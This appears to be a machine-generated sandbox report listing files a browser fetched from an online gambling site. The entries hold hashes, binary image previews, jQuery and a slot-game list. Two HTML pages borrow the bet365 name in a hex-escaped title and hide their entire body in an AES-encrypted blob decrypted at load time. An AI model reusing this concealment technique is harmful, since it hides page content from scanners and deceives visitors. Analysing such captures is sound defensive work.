                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 280 x 280, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):2481
                                                      Entropy (8bit):7.679234057450698
                                                      Encrypted:false
                                                      SSDEEP:48:JmS1/L2huC26xf9mqK9vI3Vw2m0/35Ml7jt4RbIVk5u8KvcxT5:JmS12f79m59B2m0/3443Dv
                                                      MD5:758348CB76128EABB6D3148CBD2C82F0
                                                      SHA1:AAE6C2E42E0E7785761F81915615BFDF94760727
                                                      SHA-256:278FAF92A2576C7A24865EAEB06A67EDBFA1BD20C1FB506FAF62771DDA176F72
                                                      SHA-512:33A3497856DBEE7A8ED122C74991427A3FE1B160136A7B54C125070D50A6019F4A450D4EA274AB9BF587930E1FE9F97EDA0A5666FE9A5B07A0B8052274002D5D
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/images_plus/egame/nav/24_egame_logo.png?ver=1606790110
                                                      Preview:.PNG........IHDR..............P......PLTE............................................................................................................................................................................M....-tRNS...@.`...0.... ..:.pP.....u...?h......,.n..... ....IDATx...]..0.E..F.A.0...w....lh..F.Y......................................?l...4...1.&...}......f|...dRC.ej.=Dk/.K6..U....L.F_f.waj.}4...T..,.Ge.TL#...|...0.M...[..2L2../...CQ...x.a|W..R....{..$u?....G?...s}.1..'C......i..=.)..C*=l....Oa.b.8..2.....0.2....0.2....0Un.._.c9.a..9...A0.?@......v^.f.:7..'..V.. .....k...O....!m..}.g.S^\.".t..B.............*%FQ9.D.pWX.......dKr..i'u....r...(...x)..ib...z.%F.J{@./..N{....#.=.F..p9!y....l.....$qb:...T....$*:U.mR..K.bD....Q..W..W{.r...K.b:.c`"N..:.^.. CgU.0.."..H...C...iP.....(*P....J.C'...N@...{.t u4.,N...)Hp.f.8.u....y.L.N/.1b...7..W:.D.b..r/....o.\.Dj1..0.:.......%....x)d..w..R....r..u!3.&..t....s....`..n1..<Y......=^/5.1..C..3....q..(....B....
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):124232
                                                      Entropy (8bit):6.008401507579058
                                                      Encrypted:false
                                                      SSDEEP:3072:nCK3YfXXcfckaS57wvX4VV0cUCtalY15gfNdKuzm:CK3Y/Mk+FwAAPlY+3zm
                                                      MD5:FE084114D4E137A821CC53F54C273C5D
                                                      SHA1:25592DEB2C618DE51E43BB0A2D2A6420503FEB51
                                                      SHA-256:47E4D58FC0720656D2A97E6733697B6B7C01DC7A4F3BFC195435C332F1EC02EE
                                                      SHA-512:A103D3DB147188750C33DAE5D59852FF1300633C6B0A7460537F7BAC59B92CA35D5D6FE7DBE5A0EBB505A0921BBDD14FAA11FD865A1E1DD93B5232FF58FC9034
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://b45032.com/
                                                      Preview:<!DOCTYPE html><html><head><title></title><meta charset="utf-8"><link rel="shortcut icon" href="//5getfab.segrft.com/images_plus/main/favicon.ico?ver=1606790107"><script type="text/javascript" src="/plus/js/unite/crypto-js.min.js"></script><script type="text/javascript" src="/js/www/decrypt.js"></script><script>setTimeout(function(){document['\x74\x69\x74\x6c\x65']=" bet365\u82f1\u56fd\u4e0a\u5e02\u5b98\u7f51 ";},5E2);</script></head><body><script>document.write(cryptoJsAesDecrypt("eA1NAuHqAOPK2xbhiPiPHhODM8JDbUF4ljjrnyOjluSAXYyFODo7T+JknhqVW3eNUa9El9LgxjKYSSfbquVMSYmBiIizdEMdmVF61Euyy4WhXfoJgIN3h8SUCBvWXuCOWOVSvR4hT93XNhbQbuLYkFKlJ44sZZae02f1Bx0jC6lf+UbeQ5Eh7vdIIUk17rIk55X8ZZBxYjzMPMTmmR5FaTIuj1jcKFwDn675owQGeUJ8D0KI9yrIzAxxphQYurNzbJppZrH0ceYM3j/vlXCsmhiLoquiWEhdcStN890ApBdMmqwJpvtivDaUEtVuYKNvE7RafW0sWkzpeVbfAO0KzhCLSysTWMPQBqXnn0bsJopj/CRFbMZeppl5eWeYaKzPq4xkYb2sJPBli/+G3VvFx0SIvmFePfYkFdIb4FqLnyzN1TUUfDp1Ao40EGdfZThG/G9Us2eSHekYveTBaNfuoQ0x5m9N8UNMl6aYXBQ15qYs3I3kElFTTqrL34OXGSM
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 853 x 25, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):1501
                                                      Entropy (8bit):7.602950212155415
                                                      Encrypted:false
                                                      SSDEEP:24:L6w8heMEBxrpfGXK+kkdoEh6+A+C43pYWAZl31Z6Nm8usP2agy0chcldp4H6llL8:LRDJGX0eokAnIfAD31HsPf7GrkCdm
                                                      MD5:3E635F694740916061BC36DDB7C1E1E1
                                                      SHA1:EF9D74E0CBC93BA872891BE65D08FFB9A29428DA
                                                      SHA-256:36F9BBB9A378BBE15D3D1BEEADE4B3F2C32BFD166EA073FFE3C29DEADD3DC0A2
                                                      SHA-512:C6706B7B48E71436C8ECE241C22819F5E243B285BF74F3CE2A6DF00166ACEA6664D048B8AAC5BD6F27B0F96E9A039160695D03090B670B2275051BFACE6B8397
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/images_plus/footer/en/nav_icons_best.png
                                                      Preview:.PNG........IHDR...U..........S.~....gAMA......a.....sRGB........uPLTE......................................................................................................................B/....&tRNS....@.Po/...`.f... .U...[G...t.(.z8<...>....IDATx..z.0.F.lA.eW....?.M..@".[.M.....d.$3..!.N.../.c4i..Q.A%...~..&W..S.7.[y..*%Udhy.....Ci.p+..E.".*S...<.C>..,Q........7..B:2`V.c.J.i..=....;.UC.h~..1.o.gK.h.(U.{7/H+'.Pm..pK;IT..D_...l...X0*.R8..".rD{.......Ri.Z...!.*."..@.<UVg....^M..g..|{.....`..N..B........*g.+..V...>9.BEj]..xd.*T.o..w.W.H..U.....XUT-......U.G....l9>10..z.v..T.o....$R......L6...o..G..19l9..\..Q.x..{../.:.O...B.XVT.$q.!m.W`F....z..}..E. ..... .v....>b)..G....w...u........o..*..w..U.).:>....F..v&...s..1..X..p.9..T=......T........9.....CUw..D...d...s.j.{N..&9!U.q0.*..U.>U.{.]..#"IN....#3T.`....|........].E ../..qt....(Wf/U]b~%U.y.K...P.<#K1d..0M..i.....T.,..U...*. IT.y.i.........!.......%..1.F3..IP.6P.W.$.4.o...)..N..*..P..d*.i..P...,@.\..T.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):29058
                                                      Entropy (8bit):7.989319602779076
                                                      Encrypted:false
                                                      SSDEEP:768:B7wGxIYk9A0PTpFQgewOsVxJ9b+td8qTjx4:9Ih2WvQgqch+td8wjx4
                                                      MD5:DB30E17BDBD4142262084F3F303F08F2
                                                      SHA1:A6840F260567DCC3EBEF1010747DB7EEA56BEEA8
                                                      SHA-256:E94EB172E1E6F1088C446CC15C1E02CC59A367CDA246FDF4B474B08120F71BD9
                                                      SHA-512:5821E659F453616C67C8CC64182D3A8BF418BF3044BAEDFEA92BC9210553E904CCCE3BFDC75C36549A4A5E99F55DAB844A9F1AC5F3AF8190F326D51AD01DD1A7
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR...............^.....PLTE1..(l.&].5..'O....E..+..;..n7.)..N .[$...CT!.......+.... ...c).c0...".Q.b..{6.%-;y?...9.....H......(w..",H"#o2.u..5.)4..%..>........,.?.....J.....e..X...\.....2......w........?.t .D..1...R.:..Uw@U.7'..d+...R.-...T..d....0.....,!g..+.g...3.i.pO........p.*=Ne(A....z .....h.w[[)(..H&.}..O....k.\.B={..w.Vjr<7.2......b9P..En/&......N}............;..9.....I;SA2P........Nh.....dw..Q3Kcv1.[V..C._n..-.X@..Q.z.k'....vV.....T.`I.AGA.C......NA...mO.u6SNZ.s.b6......L.u..^'y...[J.y?..h.uW....-(....4.v...ZQ?....]._-.kL.gkY@.e..........vO....[B8E......@[z.v.[x.nYe.{...nv}.}...q....x.k.{d.Y\.WlIL...O.C.Q...8~..x."..G.................2.M.......#(.}a.>y._lf..*...f....n.........b@....Up..r.......?.....G[.$7..c....m.}t.....w....&@.._.>..."......tRNS.....St.@..n,IDATx.....@.......X(.a.)..A,..@@...`#..+.# 6.r.W.E.....^........Zf..!`c...7./..w.G&..}.7.^r...tJd j.$I....Jv:5..&.?.f"#.NP..x......OT......P......4K.,C.......D5BI
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (32025)
                                                      Category:downloaded
                                                      Size (bytes):84345
                                                      Entropy (8bit):5.366447824180109
                                                      Encrypted:false
                                                      SSDEEP:1536:/P10iSi65U/dXXeyhzeBuG+HYE0mdkuJO1z6Oy4sh3J1A72BjmN7TwpDKba98HrJ:++414Jiz6fh6lTqya98HrJ
                                                      MD5:F9C7AFD05729F10F55B689F36BB20172
                                                      SHA1:43DC554608DF885A59DDEECE1598C6ACE434D747
                                                      SHA-256:F16AB224BB962910558715C82F58C10C3ED20F153DDFAA199029F141B5B0255C
                                                      SHA-512:3DCAE1FF6E98C64E3586BE3EB14DD486C51F7D4E9FA1B8F9A628BE4FBB6A9AB562F31F9B50E16D2E0C72B942BDBE84EEE8E0EF87FA730DB1428B199A59D88232
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/plus/plugin/js/jquery.min.js?ver=1606790105
                                                      Preview:/*! jQuery v2.1.4 | (c) 2005, 2015 jQuery Foundation, Inc. | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l=a.document,m="2.1.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return n.each(this,a,b)},map:function(a){return this.pushStack(n.map(this,functi
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 280 x 280, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):2848
                                                      Entropy (8bit):7.849926935479063
                                                      Encrypted:false
                                                      SSDEEP:48:pXeJBs8yE4HS4NWzoQ3t/bmoeNVlZ5nola5wi469kZ9JStWA7K:pXeJSE4HpWMQ3JaNVlZ5n43i4thGWp
                                                      MD5:30E888304CDC002C632B7E5211021686
                                                      SHA1:BD1592140ED6AA5B951B420B235EE8D185FCA9E3
                                                      SHA-256:8C642E2A146F9DABA19B1B3F0E9D7106DA5916E160BC3073195ACB70469E19CE
                                                      SHA-512:C976CB26EBA0030DB7D58D6B12DABA75A74FCA62587F17D03BC9DE8127E59FF8C30F991478257537ECEFC6247F51FA342E2ED6435AE8CF01281DB108813A413E
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/images_plus/egame/nav/11_egame_logo.png?ver=1606790110
                                                      Preview:.PNG........IHDR..............P......PLTE...!...]-!...]-........................x......2D!...............]-..................q......i............!..!..!..!..!..!......]-..............]-.]-!...]-.]-.W,.]-...........!...]-.]-!...]-!..!..!....$."$....]-.]-..........*&./&...ES|..:.....>...-&.2'!...]-....."Y../...g:=..K...{U.qG.bg..xu.kQS...o..#y..)7.=(...G..`...qc.gH.X,.M*.+%...:..m..z{~.ul.d?.`6...b..-...nZ........|.......VtRNS................@....@................pP.........pP..........`0 ...`0...x.......W.0......IDATx..............................={.m"....R4..A.....t..M#Z.-.....=.W3..Tb.c.xH.x P.h&~.,[...pd...A..A..A..A........!\...m...W.2\...m.....&\Y.^.3C.U..).v.....FpeYxm........".......+.g.k...%.......e...T..0.-.&.` .....Q..{.x^.s....T..x.xg.=.v..6..2mq.8+...@.G......2I.U....d.G.j.b..T.R".>@I.E.(Z.D....Y.%k.k.P0..^.m..`#f=Q.R}Q..........[J..6y)el.S`......v..&-6t]..@.{B5.="._.y2^....5R.E.].1OF...pcLR....m.uX.:yN...|....Z..|q....*..q..R:....WTjV
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):196956
                                                      Entropy (8bit):6.0058880873631395
                                                      Encrypted:false
                                                      SSDEEP:6144:QJKZRQzLi1OLZMXHiYcLO7ButnjLNXxfN:QJKTQvLYcy14N
                                                      MD5:43017436672F70F5AD9C75AC3F894119
                                                      SHA1:BAD9D00C518A294333B0A812E9905D11E237C50D
                                                      SHA-256:487509CDA2F245AA4D6BD32DBBFCE8E7140A630A7A6A5BCD869872AEBAE700EC
                                                      SHA-512:01F0A19DE9AEF8F718758720B66974E7EBB5F38F1599C115988F9D098F06F7967B8C808637E19624994B1170F0BF7DDC5671DACA03521D6B36ED5F31ECAED717
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://b45032.com/egame/202
                                                      Preview:<!DOCTYPE html><html><head><title></title><meta charset="utf-8"><link rel="shortcut icon" href="//5getfab.segrft.com/images_plus/main/favicon.ico?ver=1606790107"><script type="text/javascript" src="/plus/js/unite/crypto-js.min.js"></script><script type="text/javascript" src="/js/www/decrypt.js"></script><script>setTimeout(function(){document['\x74\x69\x74\x6c\x65']=" bet365\u82f1\u56fd\u4e0a\u5e02\u5b98\u7f51 ";},5E2);</script></head><body><script>document.write(cryptoJsAesDecrypt("X3Xy1Z2qYScOkuhGl/fjzWVv12pujzBCHjEjrCd1cGzH7x34lzr7Qa9B7IRthciGT3oYTtsuFPVwRInkIo7rcGpqukgWY2MrDKCl1odGRQiEZM+kf+0xZV55qjkNGPtJxTTWBiVxy1hnQtaHGDG2HKq5LNk0frhj4eSWY9J/bQkxQMdx4xwIomBGbD6pf/OBnxlbFgxqHVL+cMQe9yZGSAqGc8swiaGozO1x9bQKlmwK5EiEFOPKuZAoQzxVfsI89Yz6r/XAiHRm7Sr5LwDOuK1rbvnzVOWo18vVM5TpOVb7H/pH4B3Ex4ZQbCWfgEmJm6+EwlJV2jUuQK2tttbzD+Q2V2oFBxOf+UlD1UdCcYCwr3gN4x8RDq52a/yBTtqgKzCdubVw1rpPe4jXoQY8XBfiKQHqSSOrgpg8xv7S+Vg2dZsL8jmKmduy+1DDJFXz6e2JDw8K4GH4vYBVfMnJwFl4miY7aBIwuCktRWsIxrlltd2xgunqBfKQWy2wiqk
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 37 x 32, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):360
                                                      Entropy (8bit):6.69239738258192
                                                      Encrypted:false
                                                      SSDEEP:6:6v/lhPmmtblqclU/3PyeWTyPZAc7TKbMcqtAejVl9Q+5vH7uyae7dsgAZxx/2sFa:6v/7uiBzu/pGypFttAejVl9RjZxFAZxO
                                                      MD5:C8B8B09E3D3F8A69599182C5DF680895
                                                      SHA1:0522F162609C91017AC5977EEBB1EBD207A57525
                                                      SHA-256:AC257CDB0555003DA4B484189C57E37C9758258B6FC0FA653CE17252C6E54F41
                                                      SHA-512:B3D5B74B08547D7084A4BA0CBA601C51EC7CB4BA9AD3BD05471F7CC3EC0EE7F6B0B954D8BB20439928BE26A6A0F2E7F92EC27B95FF04FC326074AC0FE14EFB47
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR...%... .......A....9PLTE.........................................................j.0.....tRNS..:.s.:&.N...e..........IDAT8..... .Fi... ...;...O....*.|m..<A....'.S..;.....y.d.Y,tFpI..H.b...k.qM..q.<""|#...W.u=.{..R.;....+...V...nyi.S4.e.n.=.J..2W".b..>..<.Av...y..`I...k.....$F...P.u......\.`.*IZ&.q...ob}.%q.....,.|5.x&....IEND.B`.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:gzip compressed data, from Unix, truncated
                                                      Category:downloaded
                                                      Size (bytes):38
                                                      Entropy (8bit):4.1632095937363855
                                                      Encrypted:false
                                                      SSDEEP:3:FtttEOQQdLZln:XttEOQQjln
                                                      MD5:06184832952073B54A3532D68FC61853
                                                      SHA1:AA411E9A98DA33F35671D5ABF80A1614A82DA221
                                                      SHA-256:6F0EA8C3C62C3670FC1191EAAC469BDF560DD5FD965CC9D21680784A9DB59EB6
                                                      SHA-512:A9C9B9D882367E35DA36A5DBCD77DBC8FED12371A4B2EC9391700941E0415AAD560B9BBB7C981AE23FD7E12A008B642A2A1B8804698636A2E26BA7138E990E5B
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/plus/css/custom/prizedraw_pop_custom.css?ver=1663905027
                                                      Preview:..........sH.H,*N-QP*-I.P......K.....
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JSON data
                                                      Category:downloaded
                                                      Size (bytes):3476
                                                      Entropy (8bit):5.090937476469927
                                                      Encrypted:false
                                                      SSDEEP:96:UvUvkXvKvFvTpvFv7vWJvNvaTvavh4MxBrj:UvUvkXvKvFvTpvFv7vWJvNvaTvav/Hv
                                                      MD5:A3F8DF71481C0F98154824C8A3CE58C3
                                                      SHA1:2722C526FACE4961CEA9E0102DBAF458455D48BC
                                                      SHA-256:DF3F3EEBC5661A177CAB73F980D4F55618DAF0B6F185846B59A62FCDA77019EC
                                                      SHA-512:3B541A7D7BDFFD1BF86819F539CAB7BC365BE11CB246FA51A56FE64B324C0BB792D56600C53FC7AE5D241172B942B3CC93A0266F5318598BDEADF6F842DCFAF6
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://b45032.com/getegame?platform%5B%5D=202&page=1&gamename=&gameid=
                                                      Preview:{"gamelist":{"current_page":1,"data":[{"id":39634,"name":"Hawaii Vacay","pfid":202,"ppname":"Joker Slots","code":"JOKER","img":"\/\/5getfab.segrft.com\/common\/storage\/game\/egame\/joker\/zhh6mqf3z495a.png?ver=1734681327","progressive":"","ppid":202,"notry":0,"favorite":false},{"id":39550,"name":"Christmas Eve","pfid":202,"ppname":"Joker Slots","code":"JOKER","img":"\/\/5getfab.segrft.com\/common\/storage\/game\/egame\/joker\/ddodhamgc71gk.png?ver=1733716011","progressive":"","ppid":202,"notry":0,"favorite":false},{"id":39536,"name":"Mahjong Reactor","pfid":202,"ppname":"Joker Slots","code":"JOKER","img":"\/\/5getfab.segrft.com\/common\/storage\/game\/egame\/joker\/o39k3h9o685xq.png?ver=1733369194","progressive":"","ppid":202,"notry":0,"favorite":false},{"id":39535,"name":"Hot Wheels","pfid":202,"ppname":"Joker Slots","code":"JOKER","img":"\/\/5getfab.segrft.com\/common\/storage\/game\/egame\/joker\/qqgindypyeboy.png?ver=1733369194","progressive":"","ppid":202,"notry":0,"favorite":fal
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 269 x 79, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):13705
                                                      Entropy (8bit):7.980154201245431
                                                      Encrypted:false
                                                      SSDEEP:384:PDdX3vetX6BohXzVNZMrLQGPoMa5DXqDjeBCl2qRgDcz7RCgbN:bdX3OX5VNsLLov52PqCFWkv
                                                      MD5:8EC219FA20AD12844ED8609277D6F524
                                                      SHA1:B17ED9A34BCFFFD1401AF06C7DFA226D8DD565DB
                                                      SHA-256:BF924CAD503FA932910E1151CE10995F087A88F1AD38B9D47E7D6876A55C6180
                                                      SHA-512:3690F3D0F701C6E39FB390EE1C07D20251811279BE86ECE36FB43BE077F9803FB07FD3D7C5647EF111862F8D60C818800490047352031DCC67F250DEAB7FB4B9
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/images_plus/index/g03.png?ver=1606793402
                                                      Preview:.PNG........IHDR.......O......+`.....PLTE......................................................$..*.....I.$T='......aC70....$......A(.....,@."5B'."A]J:%..q(29..*I0.!Eh.9U`<-qPE5$.[G1Y;1...*Mn.x`-8A.#).....S3(...3JZLH8".-Rv`O;:).0..iJ?7.....ePxWJ (...-...#...zhjN5P7.)....kB1....="....nQ...5Yz..x.VD.nd.>d...qh.[N..#-#.....^JK3,U/...zdL.qahVF?31]7"K'.UjsPC?xN;.....p.0QmV=..xjf:,(..bWT..7P:/bG+4*...rO`f~nY.bRwUA..:FM.gGTD/6`...x.(C..o..g..Zq{.wn.k[3@Hr_G""......d.bYpD7..v..ay...z.Aq.w[=PVlC.(+&...}Y8...+Y..}j.v\.sXI;7.-6......p.gZueW8<<./0.......{.4cuP.ledWF>...mYQ.yw,Jck^[.lS..........H.+AV5;4.....~.KxNcqAXe.bBurq.wj.P....9Ih?"....AZ46+9h. ev...Qu......K@C4.........}PXZ..HRF..........o.[4......`...a....Dg..._.z.h=.|.y.........w../....^>C.S..4...........Kf..N..D..O.....e@k...ek......2DIDATx...XSe...u..o.6..... .AE...P.....B n...)T@.x .B\...!H#2-E...Q...J....i..... .8..9.9cpv.o...}...8...\..$.F..(.."). ...&]....xJ..rE*..... ...NC1.LHc..lb...e.s......Dp!<..1
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 280 x 280, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):5519
                                                      Entropy (8bit):7.9258709193212455
                                                      Encrypted:false
                                                      SSDEEP:96:xL8h+ttFQYDo6YEqFviei/L1dcHdgXpt5hf0hh78u5rJgBA4yAVW/FVGrL3n:xYh+ttgEkyL7igXT5hf2h7x5rJCtPwgT
                                                      MD5:A6B631BFBAA204CE6975180486610770
                                                      SHA1:5C26483EEF79D06DCCB073C6D62AE373D52F8D82
                                                      SHA-256:BBDD424268A479CEDAEBF778E5679A6A4258940168751FE89CA04074F34B3F44
                                                      SHA-512:ED0796A83A6C42910EF3C02BBBB62FB565CCEBDC37F3664BE21C5BBA6FD10B3107B7992B2D78B5E93F38B440E8C2C68E700DC59123982395A731AE04E1828B84
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR..............P.....CPLTE......???...???....v...$......QP....f].ppp...m`.?9.0,.dW.92..............s....,--)%.....-..$dee"....%WM.!!!..&...wk.}n.ME.G?.............RSS......NNN.......|.kmm..............ooo{{{......rf.JLL...---.........VVV....$..2[[[ABB...>>>aaa......y{{\T.899........5.....(..4../....+.(UUU...../.......2../../..........-.....;../.....-...*..........,...../..6..2.....2..8../.+..D........1..6../..8..=..0..K./.....@.*..:.,..-..0..D..H..7.......L..:.....F..E.....6..4........@..5.....2..1.1.5..=........?.....9.)..:..F..0..8..7..P..C.0....B.:..C..C..@..?..F..2.=.<.D~....._tRNS.......................A...................6.............h\M....-..{......pN..............Q<.T=....IDATx...... ....!H>q...0V&.?.....].............................,-..3...+..C..~c{?....E.....-t.u.%...;)j..dh.Rj.........*.U.(..b.j" `&.f.fZi.Z...s...a..z.>..;...|9....xc..3'6......{K._.1.BY..U.^.e...w....*..yyz..5/...K...50=QUb_.G.5.-....8..}.s.a._.......2Pb
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                      Category:downloaded
                                                      Size (bytes):1150
                                                      Entropy (8bit):4.266277802839599
                                                      Encrypted:false
                                                      SSDEEP:12:FJnhJhJJshO3El90q8SdzX5ggGJkJ5NRLstzpdJVR:Lr1shOg18YX5glJU5NRLs/3VR
                                                      MD5:E13F45BBEB4B9056CFA3D6BD2453F70F
                                                      SHA1:DFC879F8F7279EC929478FEEE93D9B2FDACCE0B1
                                                      SHA-256:331B713DE169D0E56BC71FEE2C7DF0795B24D5B24C045B3AF1A27668783A1D2B
                                                      SHA-512:006F2E5DFEEBAAF68972CA99F01C38FA00BF56CBC043F7983EEAEA4272B04641844086D62D345B29B99E67044BB86292F0EE8EDACD94F90FC270626C990D16C4
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/images_plus/main/favicon.ico?ver=1606790107
                                                      Preview:............ .h.......(....... ..... .........................Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh.."...........2...Lh..2.........../...Ip.........."...8.i.Lh..Lh..Lh..B.9.%.......5.z.....5.z.5.z.....5.z.?.H.<.X.........Lh..Lh..B.:.(.......(...<.\.............(...Ku..5.z.2.......(...Lh..Lh..Lh..>.L.....%...;.`.....2...E.0.Lt..Lh......%...G{$.Lh..Lh..Lh..(...%.......%...Ks..........#...%...Lh..............#...Lh..Lh..>.L.5.z.5.z.Ip..Lh..Lo..5.z.5.z.5.z.Lh..5.z.5.z.5.z.8.i.Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh...................i.Xr................m.Lh....m.........Lh..Lh...........z...................|.H...i.Lh..........r.9.Lh..Lh.........|.H............................Lh..........Lh..Lh..Lh.....................|.H...............z................Lh..Lh.........|.E.r.9.Lh..Lh..Xr..|.H.`y..Lh..p.7.........k.-.Lh..Lh.........r.9.Lh..Lh..Lh..Lh..Lh..Lh..Lh
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 37 x 32, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):360
                                                      Entropy (8bit):6.69239738258192
                                                      Encrypted:false
                                                      SSDEEP:6:6v/lhPmmtblqclU/3PyeWTyPZAc7TKbMcqtAejVl9Q+5vH7uyae7dsgAZxx/2sFa:6v/7uiBzu/pGypFttAejVl9RjZxFAZxO
                                                      MD5:C8B8B09E3D3F8A69599182C5DF680895
                                                      SHA1:0522F162609C91017AC5977EEBB1EBD207A57525
                                                      SHA-256:AC257CDB0555003DA4B484189C57E37C9758258B6FC0FA653CE17252C6E54F41
                                                      SHA-512:B3D5B74B08547D7084A4BA0CBA601C51EC7CB4BA9AD3BD05471F7CC3EC0EE7F6B0B954D8BB20439928BE26A6A0F2E7F92EC27B95FF04FC326074AC0FE14EFB47
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/images_plus/footer/footer-gt.png?ver=1606790107
                                                      Preview:.PNG........IHDR...%... .......A....9PLTE.........................................................j.0.....tRNS..:.s.:&.N...e..........IDAT8..... .Fi... ...;...O....*.|m..<A....'.S..;.....y.d.Y,tFpI..H.b...k.qM..q.<""|#...W.u=.{..R.;....+...V...nyi.S4.e.n.=.J..2W".b..>..<.Av...y..`I...k.....$F...P.u......\.`.*IZ&.q...ob}.%q.....,.|5.x&....IEND.B`.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):17139
                                                      Entropy (8bit):7.9574034795359445
                                                      Encrypted:false
                                                      SSDEEP:384:830nhpgegUtCLtL2IAjB/qS0diNcq1eCVL9XEav1XvJ:CqhTgVF2IAjwJENT1/VSadh
                                                      MD5:9FE6F2BA9E6A4062DEB9D44E482CF5B2
                                                      SHA1:D1ED508EBFD41BAC6EA6C96730F3F1E9A34EE075
                                                      SHA-256:1B304F462F0930A952DC84FEED2D43C6D7294E11CCA80126AFF6EF1E52E404D8
                                                      SHA-512:3CF95ED7456A241D7D1B4CCEBF171BEB8B68C7AF4DAB5D1CABE3E7D7B01CB7A078CE2F6029E0A05F7205B1DF9EFCC3CB65F7E698C8557CD391902FA6A96D760E
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/common/storage/game/egame/upg/UPG_wonderWoods.png?ver=1712128601
